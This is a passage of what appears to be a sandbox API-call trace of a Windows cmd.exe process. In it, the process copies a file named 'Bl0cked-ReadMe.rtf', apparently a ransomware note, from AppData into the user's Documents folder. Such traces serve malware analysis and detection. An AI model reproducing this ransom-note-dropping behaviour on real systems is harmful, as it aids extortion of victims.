(in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.853] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0131.853] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0131.853] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0131.853] _wcsicmp (_String1="PROMPT", 
_String2="CMDCMDLINE") returned 13 [0131.853] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0131.853] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0131.853] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0131.853] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0131.853] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0131.853] GetEnvironmentStringsW () returned 0x3522b8* [0131.853] FreeEnvironmentStringsW (penv=0x3522b8) returned 1 [0131.853] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.853] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.853] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0131.853] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0131.853] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0131.853] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0131.853] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0131.853] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0131.853] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0131.853] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0131.853] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf730 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.854] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf730, lpFilePart=0x1cf72c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf72c*="Desktop") returned 0x18 [0131.854] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.854] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf4ac | out: lpFindFileData=0x1cf4ac) returned 0x34fff8 
[0131.854] FindClose (in: hFindFile=0x34fff8 | out: hFindFile=0x34fff8) returned 1 [0131.854] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf4ac | out: lpFindFileData=0x1cf4ac) returned 0x34fff8 [0131.854] FindClose (in: hFindFile=0x34fff8 | out: hFindFile=0x34fff8) returned 1 [0131.854] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf4ac | out: lpFindFileData=0x1cf4ac) returned 0x34fff8 [0131.854] FindClose (in: hFindFile=0x34fff8 | out: hFindFile=0x34fff8) returned 1 [0131.854] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.854] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0131.854] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0131.854] GetEnvironmentStringsW () returned 0x352ad8* [0131.855] FreeEnvironmentStringsW (penv=0x352ad8) returned 1 [0131.855] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.855] GetConsoleOutputCP () returned 0x1b5 [0131.855] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.855] GetUserDefaultLCID () returned 0x409 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf870, cchData=128 | out: lpLCData="0") returned 2 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf870, cchData=128 | out: lpLCData="0") returned 2 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf870, cchData=128 | out: lpLCData="1") returned 2 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0131.856] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0131.856] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0131.856] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0131.857] GetConsoleTitleW (in: lpConsoleTitle=0x3408d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.858] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.858] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0131.858] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0131.858] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0131.859] _wcsicmp (_String1="type", _String2=")") returned 75 [0131.859] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0131.859] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0131.859] _wcsicmp (_String1="IF", _String2="type") returned -11 [0131.859] _wcsicmp (_String1="IF/?", _String2="type") returned -11 
[0131.859] _wcsicmp (_String1="REM", _String2="type") returned -2 [0131.859] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0131.863] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.864] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.864] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.864] GetFileType (hFile=0x7) returned 0x2 [0131.864] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0131.864] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf768 | out: lpMode=0x1cf768) returned 1 [0131.864] _dup (_FileHandle=1) returned 3 [0131.864] _close (_FileHandle=1) returned 0 [0131.865] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0131.865] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1cf738, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0131.866] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0131.866] GetConsoleTitleW (in: lpConsoleTitle=0x1cf568, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.944] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0131.944] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0131.944] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0131.944] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0131.945] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.945] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1cf0cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf0cc) returned 0x340e50 [0131.945] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0131.945] _wcsicmp 
(_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0131.945] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0131.945] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cdfd8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0131.945] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0131.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.945] GetFileType (hFile=0x54) returned 0x1 [0131.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.946] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1ce030 | out: lpFileSizeHigh=0x1ce030*=0x0) returned 0x1632 [0131.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.946] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.946] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x200, lpOverlapped=0x0) returned 1 [0131.947] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.947] GetFileType (hFile=0x4c) returned 0x1 [0131.947] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.947] GetFileType (hFile=0x4c) returned 0x1 [0131.947] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.947] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] GetFileType (hFile=0x4c) returned 0x1 
[0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceeb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceeb8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] GetFileType (hFile=0x4c) returned 0x1 [0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef08*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] GetFileType (hFile=0x4c) returned 0x1 [0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef58*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] GetFileType (hFile=0x4c) returned 0x1 [0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cefa8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] GetFileType (hFile=0x4c) returned 0x1 [0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceff8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.948] GetFileType (hFile=0x4c) returned 0x1 [0131.948] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0131.948] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf048*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cf048*, lpNumberOfBytesWritten=0x1ce04c*=0x20, lpOverlapped=0x0) returned 1 [0131.948] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.948] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.949] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.949] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x200, lpOverlapped=0x0) returned 1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] GetFileType (hFile=0x4c) returned 0x1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] GetFileType (hFile=0x4c) returned 0x1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] GetFileType (hFile=0x4c) returned 0x1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceeb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceeb8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] GetFileType (hFile=0x4c) returned 0x1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef08*, lpNumberOfBytesWritten=0x1ce04c*=0x50, 
lpOverlapped=0x0) returned 1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] GetFileType (hFile=0x4c) returned 0x1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef58*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] GetFileType (hFile=0x4c) returned 0x1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cefa8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] GetFileType (hFile=0x4c) returned 0x1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceff8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] GetFileType (hFile=0x4c) returned 0x1 [0131.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.949] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf048*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cf048*, lpNumberOfBytesWritten=0x1ce04c*=0x20, lpOverlapped=0x0) returned 1 [0131.949] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.950] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.950] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.950] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: 
lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x200, lpOverlapped=0x0) returned 1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] GetFileType (hFile=0x4c) returned 0x1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] GetFileType (hFile=0x4c) returned 0x1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] GetFileType (hFile=0x4c) returned 0x1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceeb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceeb8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] GetFileType (hFile=0x4c) returned 0x1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef08*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] GetFileType (hFile=0x4c) returned 0x1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef58*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] GetFileType (hFile=0x4c) returned 0x1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefa8*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cefa8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] GetFileType (hFile=0x4c) returned 0x1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.951] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceff8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.951] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.951] GetFileType (hFile=0x4c) returned 0x1 [0131.951] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.951] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf048*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cf048*, lpNumberOfBytesWritten=0x1ce04c*=0x20, lpOverlapped=0x0) returned 1 [0131.951] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.951] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.951] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.951] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x200, lpOverlapped=0x0) returned 1 [0131.951] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.951] GetFileType (hFile=0x4c) returned 0x1 [0131.951] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.951] GetFileType (hFile=0x4c) returned 0x1 [0131.951] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.951] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.951] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0131.951] GetFileType (hFile=0x4c) returned 0x1 [0131.951] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.951] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceeb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceeb8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.951] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.951] GetFileType (hFile=0x4c) returned 0x1 [0131.951] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.951] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef08*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.951] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.951] GetFileType (hFile=0x4c) returned 0x1 [0131.952] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.952] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef58*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.952] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.952] GetFileType (hFile=0x4c) returned 0x1 [0131.952] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.952] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cefa8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.952] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.952] GetFileType (hFile=0x4c) returned 0x1 [0131.952] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.952] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceff8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.952] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.952] GetFileType (hFile=0x4c) 
returned 0x1 [0131.952] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.952] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf048*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cf048*, lpNumberOfBytesWritten=0x1ce04c*=0x20, lpOverlapped=0x0) returned 1 [0131.952] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.952] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.952] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.952] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x200, lpOverlapped=0x0) returned 1 [0131.952] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.952] GetFileType (hFile=0x4c) returned 0x1 [0131.952] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.952] GetFileType (hFile=0x4c) returned 0x1 [0131.952] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.952] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] GetFileType (hFile=0x4c) returned 0x1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceeb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceeb8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] GetFileType (hFile=0x4c) returned 0x1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef08*, 
